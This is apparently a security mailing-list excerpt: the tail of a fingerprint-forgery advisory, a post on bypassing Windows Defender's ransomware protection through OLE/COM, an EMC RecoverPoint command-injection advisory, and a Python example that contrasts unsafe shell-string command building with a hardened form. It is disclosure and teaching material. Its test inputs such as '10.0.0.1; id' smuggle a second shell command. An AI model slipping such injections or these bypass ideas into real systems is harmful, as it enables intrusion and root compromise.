Spread   Exposition   Exploitation   Detection
LOW      MODERATE     MODERATE       EASY

Problem Description & Causes
Reference 1 has proved the biometric security of European bills for
counterfeiting a fingerprint in a PoC.

Possible threat scenarios
1. Avoiding person-related biometric backup in mobile devices, such as the
Apple iPhone, and many more.
2. If necessary Falsification of the biometric identifiers of identity
documents. Fake ID documents can be sold on the black market with a one
time registered fingerprint. The number of copies and persons is irrelevant.

Countermeasures:
1. Generate Awareness among Manufacturers and Users of Smart Meter
Biometrics.
2. Educate data feeders so that fingers are free of foreign matter (e.g.,
glue, or the like) and checked.
3. Organization

[FD] Microsoft Anti Ransomware mitigation bypass

2018-02-02 Thread Yago Jesus
Hi,

Since Windows 10 Fall Creators Update, Microsoft added protection for
Ransomware in their product ‘Windows Defender’

By default, Office executables are included in the whitelist so these
programs could make changes in protected folders without restrictions.

This access level is granted even if a malicious user uses OLE/COM objects
to drive Office executables programmatically.

So a ransomware developer could adapt their software to use OLE objects to
change / delete / encrypt files invisibly to the file owner.

More info with PoC code here (Also the surprising answer from Microsoft )
:
http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html


[FD] ESA-2018-015: EMC RecoverPoint Command Injection Vulnerabilities

2018-02-02 Thread EMC Product Security Response Center
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

ESA-2018-015: EMC RecoverPoint Command Injection Vulnerabilities

EMC Identifier: ESA-2018-015
CVE Identifier: CVE-2018-1184, CVE-2018-1185
Severity Rating: See below for individual scores

Affected products:  
*   EMC RecoverPoint for Virtual Machines versions prior to 5.1.1
*   EMC RecoverPoint version 5.1.0.0
*   EMC RecoverPoint versions prior to 5.0.1.3

Summary:  
EMC RecoverPoint contains command injection vulnerabilities that could 
potentially be exploited by malicious users to compromise the affected systems. 

Details:  
EMC RecoverPoint is susceptible to the following command injection 
vulnerabilities:

*   Command injection vulnerability in Admin CLI may allow a malicious user 
with admin privileges to escape from the restricted shell to an interactive 
shell and run arbitrary commands with root privileges (CVE-2018-1185). 

CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

*   Command injection vulnerability in Boxmgmt CLI may allow a malicious 
user with boxmgmt privileges to bypass Boxmgmt CLI and run arbitrary commands 
with root privileges (CVE-2018-1184). 

CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Resolution:  
The following EMC RecoverPoint releases contain resolutions to these 
vulnerabilities:
*   EMC RecoverPoint for Virtual Machines 5.1.1
*   EMC RecoverPoint for Virtual Machines 5.0.1.3
*   EMC RecoverPoint 5.1.0.1
*   EMC RecoverPoint 5.0.1.3
 
EMC recommends all customers upgrade to one of the above versions at the 
earliest opportunity. Customers are strongly advised to limit administrator 
privileges to trusted users and change default passwords to minimize the risk.  
See Security Configuration Guide for details.

Link to remedies:
Customers can download software from:  
https://support.emc.com/search/?text=RecoverPoint&searchLang=en_US&facetResource=DOWN

Credits:
EMC would like to thank Geoffrey Janjua, Mike Erman, Jack Backer, and Alexander 
Gonzalez from Northrop Grumman for reporting these vulnerabilities.


Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC recommends that all users determine the applicability of this information 
to their individual situations and take appropriate action. The information set 
forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event, shall EMC or its suppliers, be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages, so the 
foregoing limitation may not apply.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJacfuGAAoJEHbcu+fsE81ZXXEH/jmPlsfbucZdxcvxW69ICyeA
6xMF+iB0U9bp4xyE3tW07oxr/E0zXO5aDVEIvgwEzeuZ9d2rDVqqayO4nKLAP+34
YMlj+Zo36g3JL2HdaAxv4MwmoPgwTMVoWjmkW2eRUGx5HoBlLLxYsnpXxH+/7Nr5
9d5Vs0HdHXeQWYALUwhe6ypza8iUq2KJsJb4dkuHGzr66/qiOQuTCU+kMuWYfKqN
wKNk5jscd/EWEehXOeHFd2rRvAha/Gyt54Z6bqz1/VrsOtUkPjtOsavhFuuJMSdX
7fxFpE1GaeTmA0dX4LGjcf1o3cjuvfKoQR1JJiXHXjsKSNuoWdKSNYjnySfdyxA=
=BcQ/
-----END PGP SIGNATURE-----

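The EMC advisory above describes command injection in two restricted CLIs that lets a user break out to a root shell, without saying how those CLIs build their commands. The following is an added example, not from the advisory or from RecoverPoint, showing the pattern behind this bug class in a management CLI: a command assembled as a shell string from a user-supplied argument, beside the form that cannot be escaped from, an allow-listed argument passed as its own argv element with no shell involved. The ping command, the hostname policy and the sample inputs are assumptions of this example.

```python
"""Added example, not from the EMC advisory or from RecoverPoint: the pattern
behind command injection in a management CLI (argument pasted into a shell
string) beside the hardened form (allow-listed argument passed as argv)."""
import re
import shlex
import subprocess

# Shell tokens that start a second command; their presence in a string that was
# meant to be one argument means the argument escaped its role.
COMMAND_SEPARATORS = {";", "&&", "||", "|", "&"}

# Allow-list for a hostname/IP argument (assumed policy for the example).
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$")


def build_shell_command_unsafe(host: str) -> str:
    """The vulnerable form: the argument is interpolated into a string that is
    then handed to 'sh -c' (subprocess with shell=True, os.system and the like)."""
    return f"ping -c 1 {host}"


def shell_commands_in(command: str) -> list[str]:
    """Tokenises the string the way a POSIX shell would and returns the command
    separators found, i.e. the extra commands the argument smuggled in."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if tok in COMMAND_SEPARATORS]


def validate_host(host: str) -> bool:
    return bool(HOST_RE.match(host))


def safe_argv(host: str) -> list[str]:
    """The hardened form: validate against an allow-list, then pass the value as
    a single argv element. No shell parses it, so metacharacters are inert."""
    if not validate_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Runs the validated argv without shell=True; returns the exit status."""
    return subprocess.run(safe_argv(host), capture_output=True, check=False).returncode


if __name__ == "__main__":
    # Constructed inputs: one legitimate host and two injection attempts.
    for attempt in ["db-01.example.internal", "10.0.0.1; id", "10.0.0.1 && id"]:
        unsafe = build_shell_command_unsafe(attempt)
        print(repr(unsafe), "->", shell_commands_in(unsafe))
        try:
            print("argv:", safe_argv(attempt))
        except ValueError as exc:
            print(exc)
```

Quoting the argument with shlex.quote would also stop these two attempts, but an allow-list plus argv is the form to prefer in a restricted shell: it rejects anything the tool was not designed to accept rather than trying to neutralise every way a shell might reinterpret it, and it leaves nothing for the shell to parse at all.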